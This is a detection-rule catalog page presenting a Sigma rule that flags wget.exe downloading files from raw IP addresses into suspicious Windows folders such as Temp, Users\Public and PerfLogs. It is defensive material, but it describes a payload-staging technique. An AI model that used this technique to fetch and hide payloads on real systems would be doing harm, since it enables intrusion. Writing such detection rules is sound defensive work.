Detection rules › Sigma
Suspicious File Download From IP Via Wget.EXE - Paths
Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| Sysmon | 1 | Process creation |
Stages and Predicates
Stage 1: all of selection_img
or:
Image|endswith: '\wget.exe'
OriginalFileName: wget.exe
Stage 2: all of selection_ip
CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
Stage 3: all of selection_http
CommandLine|contains: http
Stage 4: all of selection_flag
or:
CommandLine|contains: --output-document
CommandLine|re: '\s-O\s'
Stage 5: all of selection_paths
or:
CommandLine|contains: ':\Users\'
CommandLine|contains: '\Contacts\'
CommandLine|contains: ':\Users\'
CommandLine|contains: '\Favorites\'
CommandLine|contains: ':\Users\'
CommandLine|contains: '\Favourites\'
CommandLine|contains: ':\Users\'
CommandLine|contains: '\Pictures\'
CommandLine|contains: ':\PerfLogs\'
CommandLine|contains: ':\Temp\'
CommandLine|contains: ':\Users\Public\'
CommandLine|contains: ':\Windows\Help\'
CommandLine|contains: ':\Windows\Temp\'
CommandLine|contains: '\Temporary Internet'
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
CommandLine | match |
|
CommandLine | regex_match |
|
Image | ends_with |
|
OriginalFileName | eq |
|